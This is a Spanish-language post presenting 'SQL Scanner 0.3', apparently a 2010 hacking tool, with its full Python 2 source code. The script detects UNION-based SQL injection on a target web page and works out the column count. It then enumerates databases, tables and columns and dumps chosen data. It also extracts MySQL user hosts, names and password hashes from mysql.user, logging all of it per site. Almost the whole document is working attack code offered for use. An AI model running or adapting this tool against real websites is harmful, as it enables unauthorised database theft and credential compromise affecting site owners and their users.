Con las sig opciones :
- Verifica vulnerabilidad
- Busca columnas
- Busca el numero milagroso y saca info sobre la DB
- Saca tablas y columnas de de la DB actual o otra externa
- Dumpear usuarios
- Guarda todo en un log con el nombre de la web en la carpeta /logs
Código
#!usr/bin/python #SQL Scanner 0.3 (C) Doddy Hackman 2010 import os,sys,urllib2,re,binascii from urlparse import urlparse def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def savefile(name,text): file = open(name,"a") file.write("\n"+text+"\n") file.close() def gethost(test): return urlparse(test).netloc def header() : print "\n--== SQL Scanner ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" sys.exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/*") else: return("+","--") def dumper(web,passx,table,col1,col2): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web) code1 = toma(web1+pass1+"from"+pass1+table+pass2) print "\n\n[+] Searching values\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] Values Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): c1 = re.findall("K0BRA(.*?)K0BRA",code2) c1 = c1[0] c2 = re.findall("K0BRA1(.*?)K0BRA1",code2) c2 = c2[0] print "["+col1+"] : "+c1 print "["+col2+"] : "+c2+"\n" savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1) savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n") else: print "[-] Not Found\n" def mysqluser(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web) code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) print "\n\n[+] Searching mysql.user\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] mysql.user : ON" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON") savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n") print "[+] Users Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): host = re.findall("K0BRA(.*?)K0BRA",code2) host = host[0] user = re.findall("K0BRA1(.*?)K0BRA1",code2) user = user[0] passw = re.findall("K0BRA2(.*?)K0BRA2",code2) passw = passw[0] savefile("logs/"+gethost(web)+".txt","[Host] : "+host) savefile("logs/"+gethost(web)+".txt","[User] : "+user) savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n") print "[Host] : "+host print "[User] : "+user print "[Pass] : "+passw+"\n" else: print "[-] Not Found\n" def showcolumnsdb(web,db,table,passx): db = "0x"+str(binascii.hexlify(db)) table = "0x"+str(binascii.hexlify(table)) pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching columns in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] savefile("logs/"+gethost(web)+".txt","[DB] : "+db) savefile("logs/"+gethost(web)+".txt","[DB] : "+table) print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column) print "[Column Found] : "+column else: print "[-] Not Found\n" def showtablesdb(web,db,passx): db = "0x"+str(binascii.hexlify(db)) pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching tables in DB\n\n" savefile("logs/"+gethost(web)+".txt","[DB] : "+db) if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showtables(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) print "\n\n[+] Searching tables\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(17,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showcolumns(tabla,web,passx): pass1,pass2 = bypass(passx) tabla = "0x"+str(binascii.hexlify(tabla)) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2) print "\n\n[+] Searching tables\n\n" savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla) if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] print "[Column Found] : "+column savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column) else: print "[-] Not Found\n" def showdbs(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) print "\n\n[+] Searching DBS\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] DBS Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): db = re.findall("K0BRA(.*?)K0BRA",code2) db = db[0] print "[DB Found] : "+db savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db) else: print "[-] Not Found\n" def menu(page,bypass): clean() header() print "\n[+] Target : ",page,"\n" print "\n[information_schema]\n\n" print "1 - Show tables\n" print "2 - Show columns of the a table\n" print "3 - Show databases\n" print "4 - Show tables from the a DB\n" print "5 - Show columns from the a table of the DB\n" print "\n[mysql.user]\n\n" print "6 - Show users\n" print "\n[Others]\n\n" print "7 - Show details\n" print "8 - Dump data\n" print "9 - Show log\n" print "10 - Change target\n" print "11 - Exit\n\n" try: op = input("[Option] : ") if op == 1: showtables(page,bypass) raw_input() menu(page,bypass) elif op == 2: table = raw_input("\n\n[Table] : ") showcolumns(table,page,bypass) raw_input() menu(page,bypass) elif op == 3: showdbs(page,bypass) raw_input() menu(page,bypass) elif op == 4: db = raw_input("\n\n[DB] : ") showtablesdb(page,db,bypass) raw_input() menu(page,bypass) elif op == 5: db = raw_input("\n\n[DB] : ") table = raw_input("\n\n[Table] : ") showcolumnsdb(page,db,table,bypass) raw_input() menu(page,bypass) elif op == 6: mysqluser(page,bypass) raw_input() menu(page,bypass) elif op == 7: more(page,bypass) raw_input() menu(page,bypass) elif op == 8: table = raw_input("\n\n[Table] : ") col1 = raw_input("\n\n[Column 1] : ") col2 = raw_input("\n\n[Column 2] : ") dumper(page,bypass,table,col1,col2) raw_input() menu(page,bypass) elif op == 9: os.system("start logs/"+gethost(page)+".txt") menu(page,bypass) elif op == 10: sta() except: menu(page,bypass) if op == 11: copyright() def more(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Searching more data\n" web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web) code0 = toma(web1+pass2) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1]) savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2]) savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n") code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on") code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on") def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))" for te in range(2,30): number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2) if (re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla) menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "[-] Length dont found\n" def scan(web,passx): pass1,pass2 = bypass(passx) print "\n\n[+] Testing vulnerability" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2) if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" copyright() def sta(): clean() header() web = raw_input("\n\n[Page] : ") bypasx = raw_input("\n\n[Bypass] : ") scan(web,bypasx) sta() #The End